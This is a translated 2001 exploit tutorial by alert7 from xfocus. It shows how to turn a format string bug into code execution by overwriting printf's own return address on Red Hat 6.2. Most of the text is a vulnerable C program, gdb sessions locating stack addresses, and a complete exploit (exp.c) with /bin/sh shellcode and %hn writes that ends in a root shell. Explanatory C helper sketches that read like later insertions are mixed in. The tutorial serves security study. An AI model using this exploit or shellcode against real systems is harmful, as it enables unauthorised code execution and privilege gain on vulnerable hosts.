[Analysis] Using a format string to overwrite the return address of the *printf() functions themselves


Created: 2001-10-29
Article type: original
Source: http://www.xfocus.org/
Submitted by: alert7 (sztcww_at_sina.com)

Author: alert7 <mailto: alert7@netguard.com.cn
                        alert7@xfocus.org>

Home page: http://www.netguard.com.cn
           http://www.xfocus.org

Date: 2001-10-26

Test environment: Linux Red Hat 6.2, kernel 2.2.14

★ Preface

scut's <<Exploiting Format String Vulnerabilities v1.2>> lists six fairly
general ways to gain control:

1. Overwriting the GOT
2. Using DTORS
3. Using C library hooks
4. Using the atexit structure (statically linked binaries only)
5. Overwriting function pointers
6. Overwriting jmpbufs

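I do not want to discuss those here; please consult the relevant material yourself.

Sometimes, however, you can only overwrite addresses in the range
0xbfff0000-0xbfffffff, because the program restricts the format string, and the
program also calls exit(0). (Perhaps you have never met a vulnerable program like
this, but I have, and its constraints were even harsher :( ) In that case
overwriting the GOT, using DTORS, and using C library hooks all fail, because
those addresses start with 0x08 (C library hooks live in libc, whose addresses
start with 0x40 in this environment). Overwriting main's return address does not
work either, since the program leaves through exit(0) and main never returns.
There must still be something we can overwrite to hand control to our shellcode.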

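★ Overwriting the format function's own return address

With an ordinary buffer overflow it is generally not possible to overwrite the
return address of a glibc function such as *printf(), but a format string gives
us that chance, and in my view with better precision.
For example, with printf(buf), we use the format string in buf to overwrite the
return address of printf itself.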

★ A program with a format string bug

[alert7@redhat62 alert7]# cat vul.c

#include <stdio.h>
int main(int argc,char **argv)
{
char buf[10000];
bzero(buf,10000);
if (argc==2) {
strncpy(buf,argv[1],9999);
printf(buf);
}
}
[alert7@redhat62 alert7]# gcc -o vul vul.c -g

★ Pinning down a few values precisely

1. Count the junk words (in units of 4 bytes)

[alert7@redhat62 alert7]# ./vul aaaa%p%p%p%p%p%p%p%p%p
aaaa0x616161610x702570250x702570250x702570250x702570250x7025(nil)(nil)(nil)
The first %p already prints 0x61616161 (our "aaaa"), so there are no junk words
and X=0. If this is unclear, please consult
<<Exploiting Format String Vulnerabilities>>
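
The counting step above can be sketched in C. This is only an illustration under stated assumptions: the helper name count_junk_words and the idea of first collecting the %p output into an array of 32-bit words are hypothetical and not part of the original write-up; the marker 0x61616161 is the "aaaa" probe used above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Marker word produced by the leading "aaaa" of the probe string. */
#define MARKER 0x61616161u

/*
 * Hypothetical helper: given the words printed by successive %p
 * conversions, return the index of the first marker word, i.e. the
 * number X of junk words, or -1 if the marker was not seen.
 */
static int count_junk_words(const uint32_t *words, size_t n)
{
    assert(words != NULL);
    for (size_t i = 0; i < n; i++) {
        if (words[i] == MARKER)
            return (int)i;
    }
    return -1;
}
```

For the dump shown above, the first word is already 0x61616161, so the helper would return 0, which matches X=0.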

2. Find the address of the format string

[alert7@redhat62 alert7]# gdb vul -q
(gdb) disass main
Dump of assembler code for function main:
0x8048438 <main>:       push   %ebp
0x8048439 <main+1>:     mov    %esp,%ebp
0x804843b <main+3>:     sub    $0x2710,%esp
0x8048441 <main+9>:     push   $0x2710
0x8048446 <main+14>:    lea    0xffffd8f0(%ebp),%eax
0x804844c <main+20>:    push   %eax
0x804844d <main+21>:    call   0x8048364 <bzero>
0x8048452 <main+26>:    add    $0x8,%esp
0x8048455 <main+29>:    cmpl   $0x2,0x8(%ebp)
0x8048459 <main+33>:    jne    0x8048487 <main+79>
0x804845b <main+35>:    push   $0x270f
0x8048460 <main+40>:    mov    0xc(%ebp),%eax
0x8048463 <main+43>:    add    $0x4,%eax
0x8048466 <main+46>:    mov    (%eax),%edx
0x8048468 <main+48>:    push   %edx
0x8048469 <main+49>:    lea    0xffffd8f0(%ebp),%eax
0x804846f <main+55>:    push   %eax
0x8048470 <main+56>:    call   0x8048374 <strncpy>
0x8048475 <main+61>:    add    $0xc,%esp
0x8048478 <main+64>:    lea    0xffffd8f0(%ebp),%eax
0x804847e <main+70>:    push   %eax
0x804847f <main+71>:    call   0x8048354 <printf>
0x8048484 <main+76>:    add    $0x4,%esp
0x8048487 <main+79>:    leave
0x8048488 <main+80>:    ret
End of assembler dump.

(gdb) b * 0x804847f
Breakpoint 1 at 0x804847f: file vul.c, line 8.
(gdb) r aaaa
Starting program: /home/alert7/overflow/sploit/vul aaaa

Breakpoint 1, 0x804847f in main (argc=2, argv=0xbffffba4) at vul.c:8
8       printf(buf);

(gdb)  p &buf
$1 = (char (*)[10000]) 0xbfffd468
~~~~~~~~~~~~~~~~~~~~~~~^0xbfffd468 format string addr

(gdb) i reg $eax $esp $ebp
eax            0xbfffd468       -1073752984
esp            0xbfffd464       -1073752988
ebp            0xbffffb78       -1073742984

(gdb) x/8x 0xbfffd450
0xbfffd450:     0xbfffd468      0xbffffb78      0x08048475      0xbfffd468
0xbfffd460:     0xbffffcbf      0xbfffd468      0x61616161      0x00000000

(gdb) si
0x8048354 in printf () at printf.c:26
26      printf.c: No such file or directory.

(gdb) x/8x 0xbfffd450
0xbfffd450:     0xbfffd468      0xbffffb78      0x08048475      0xbfffd468
0xbfffd460:     0x08048484      0xbfffd468      0x61616161      0x00000000
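~~~~~~~~~~~~~~~~~^this word has now become 0x08048484, the return address of this printf call,
so we have also found where printf's return address is stored: 0xbfffd460
The word at 0xbfffd464 is simply what push %eax put there
0xbfffd460 is where the saved EIP of this printf's stack frame is stored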

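3. Compute the address where printf's return address is stored

As a formula, the address where printf's return address is stored is:
(format string addr) - (X*4) - 8
The format string addr can be brute-forced, and X is even easier to obtain, so
this address is very precise.
Of course, different systems, different format strings and so on will change
where the *printf functions' return address is stored, so you need to investigate
and correct the formula yourself. This is only a simple demonstration meant to
invite further work.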
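
As a worked instance of the formula, a minimal C sketch follows. The function name printf_retloc is hypothetical; the constant 8 is read off the gdb session above (4 bytes for the pushed format pointer at 0xbfffd464 plus 4 bytes for the return address slot at 0xbfffd460) and may differ on other systems.

```c
#include <assert.h>
#include <stdint.h>

/*
 * Hypothetical helper for the formula F - X*4 - 8:
 *   fmt_addr   = F, address of the format string on the stack
 *   junk_words = X, number of 4-byte junk words before the string
 */
static uint32_t printf_retloc(uint32_t fmt_addr, uint32_t junk_words)
{
    uint32_t below = junk_words * 4u + 8u;

    assert(fmt_addr >= below);   /* guard against wrap-around */
    return fmt_addr - below;
}
```

With F=0xbfffd468 and X=0 this gives 0xbfffd460, the address found in gdb above.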

★ A look at our exploit program

[alert7@redhat62 alert7]# cat exp.c
/*e*/
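#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define DEFAULT_OFFSET                    0
#define DEFAULT_ALIGNMENT                 0
#define DEFAULT_RETLOC                  (0xbfffd468-0*4-8) //F-X*4-8
                          //F is the address of the format string
                          //X is the number of junk words; X*4 is
                          //the distance from esp to F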

#define NOP                            0x90

char shellcode[] =
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(int argc, char *argv[]) {
  char *ptr;

  long shell_addr,retloc=DEFAULT_RETLOC;
  int i,SH1,SH2;
  char buf[512];
  char buf1[5000];

  printf("Using RET location address: 0x%lx\n", retloc);
  shell_addr = retloc+80;
  printf("Using Shellcode address: 0x%lx\n", shell_addr);

SH1 = (shell_addr >> 16) & 0xffff;//SH1=0xbfff
SH2 = (shell_addr >>  0) & 0xffff;//SH2=0xd4b0 with the default retloc

ptr = buf;

if ((SH1)<(SH2))
{
       memset(ptr,'B',4);
       ptr += 4 ;
       (*ptr++) =  (retloc+2) & 0xff;
       (*ptr++) = ((retloc+2) >> 8  ) & 0xff ;
       (*ptr++) = ((retloc+2) >> 16 ) & 0xff ;
       (*ptr++) = ((retloc+2) >> 24 ) & 0xff ;
       memset(ptr,'B',4);
       ptr += 4 ;
       (*ptr++) =  (retloc) & 0xff;
       (*ptr++) = ((retloc) >> 8  ) & 0xff ;
       (*ptr++) = ((retloc) >> 16 ) & 0xff ;
       (*ptr++) = ((retloc) >> 24 ) & 0xff ;

        sprintf(ptr,"%%%uc%%hn%%%uc%%hn",(SH1-8*2),(SH2-SH1 ));
    /* %hn is recommended when constructing the format string */
}

if ((SH1 )>(SH2))
{
       memset(ptr,'B',4);
       ptr += 4 ;
       (*ptr++) =  (retloc) & 0xff;
       (*ptr++) = ((retloc) >> 8  ) & 0xff ;
       (*ptr++) = ((retloc) >> 16 ) & 0xff ;
       (*ptr++) = ((retloc) >> 24 ) & 0xff ;
       memset(ptr,'B',4);
       ptr += 4 ;
       (*ptr++) =  (retloc+2) & 0xff;
       (*ptr++) = ((retloc+2) >> 8  ) & 0xff ;
       (*ptr++) = ((retloc+2) >> 16 ) & 0xff ;
       (*ptr++) = ((retloc+2) >> 24 ) & 0xff ;

        sprintf(ptr,"%%%uc%%hn%%%uc%%hn",(SH2-8*2),(SH1-SH2 ));
}
if ((SH1 )==(SH2))
    {
    printf("This case cannot be handled with a single printf\n");
    return 1;
    }
sprintf(buf1,"%s%s",buf,shellcode);
execle("./vul","vul",buf1, NULL,NULL);
}
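
The width arithmetic in exp.c can be isolated into a small helper. The sketch below is an illustration, not the author's code: the name build_hn_tail and its parameters are hypothetical, and it assumes the same 16-byte header ("BBBB" + address, twice) that exp.c places before the conversions.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>

/*
 * Hypothetical helper mirroring exp.c: write the "%<w1>c%hn%<w2>c%hn"
 * tail that follows a 16-byte header. The smaller 16-bit half of
 * shell_addr is written first, because %hn stores a running count
 * that can only grow. *high_first is set to 1 when the first %hn must
 * target retloc+2 (the high half), 0 when it must target retloc.
 * Returns 0 on success, -1 if the halves are equal, the first width
 * would not be positive, or the output buffer is too small.
 */
static int build_hn_tail(uint32_t shell_addr, char *out, size_t out_len,
                         int *high_first)
{
    unsigned hi = (shell_addr >> 16) & 0xffffu;
    unsigned lo = shell_addr & 0xffffu;
    unsigned first = hi < lo ? hi : lo;
    unsigned second = hi < lo ? lo : hi;
    int n;

    assert(out != NULL && high_first != NULL);
    if (hi == lo || first <= 16u)
        return -1;
    *high_first = hi < lo;
    /* 16 bytes of header have already been counted by printf. */
    n = snprintf(out, out_len, "%%%uc%%hn%%%uc%%hn",
                 first - 16u, second - first);
    return (n > 0 && (size_t)n < out_len) ? 0 : -1;
}
```

For the default shell address 0xbfffd4b0 (retloc 0xbfffd460 plus 80), the halves are 0xbfff and 0xd4b0, so the widths come out as 49135 and 5297.
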

[alert7@redhat62 alert7]# gcc -o exp exp.c
[alert7@redhat62 alert7]# ./exp
    ...... (some garbage printf output omitted)
               B隵1繤F
                      ?
                       骎
                         ?圬@丸?/bin/sh[alert7@redhat62 alert7]#
Why did it not succeed? To find out, add sleep(30); before printf(buf) in vul.c.
First run ./exp on one tty, then do the following on another tty:
[alert7@redhat62 /alert7]# ps -aux|grep vul
alert7       892  0.3  0.3  1084  296 pts/0    S    10:41   0:00 vul BBBBb?緽BBB`
alert7       895  0.0  0.5  1360  508 pts/3    S    10:42   0:00 grep vul
[alert7@redhat62 alert7]# gdb vul -q
(gdb) attach 892
Attaching to program: /home/alert7/vul, Pid 892
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
0x400a9c61 in __libc_nanosleep () from /lib/libc.so.6
(gdb) b printf
Breakpoint 1 at 0x4006605c: file printf.c, line 30.
(gdb) c
Continuing.

Breakpoint 1, printf (
    format=0xbfffd718 "BBBBb?緽BBB`??49135c%hn%5297c%hn", '/220' <repeats 128
times>, "隲037^/211v/b1繺210F/a/211F/f癨013/211骪215N/b/215V/f蚛2001踈211谸蚛20
0柢"...) at printf.c:30
30      printf.c: No such file or directory.
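We can see that when vul is started through execle, the format string is no
longer at the original 0xbfffd468 but at format=0xbfffd718, so the exploit should
be changed to use this address. Recompile and run.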
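
To see what the corrected address implies, the sketch below recomputes the jump target and checks that it still lands in the NOP sled. It is an illustration under assumptions taken from exp.c (X=0, a 16-byte header, 128 NOP bytes, shell_addr = retloc + 80); the function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

#define HEADER_LEN   16u   /* "BBBB" + address, twice, as in exp.c */
#define SLED_LEN     128u  /* NOP bytes at the start of shellcode[] */
#define SHELL_OFFSET 80u   /* exp.c uses shell_addr = retloc + 80 */

/* Jump target for a given format string address, assuming X = 0. */
static uint32_t shell_addr_for(uint32_t fmt_addr)
{
    assert(fmt_addr >= 8u);
    return fmt_addr - 8u + SHELL_OFFSET;
}

/*
 * With X = 0 the return slot sits 8 bytes below the format string, so
 * retloc + 80 is byte (80 - 8) of the string. Return 1 if that byte
 * falls inside the NOP sled that follows the header and a
 * "%..c%hn%..c%hn" tail of tail_len characters, 0 otherwise.
 */
static int target_in_sled(uint32_t tail_len)
{
    uint32_t sled_start = HEADER_LEN + tail_len;
    uint32_t target = SHELL_OFFSET - 8u;

    return target >= sled_start && target < sled_start + SLED_LEN;
}
```

For format=0xbfffd718 the return slot is 0xbfffd710 and the jump target is 0xbfffd760. With a 19-character tail the sled covers string offsets 35 to 162, and offset 72 lies inside it.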
[alert7@redhat62 alert7]# ./exp
..... (some garbage printf output omitted)
B隵1繤F
骎
?圬@蚥ash#
bash# :) OK, it worked!!!

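★ Summary

Using a format string to overwrite the return address of the *printf() functions
themselves appears to be a rather good method; it is well suited to format string
bugs and offers better precision.
Finally, feedback by email is welcome.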

References:
<<Exploiting Format String Vulnerabilities>> by scut / team teso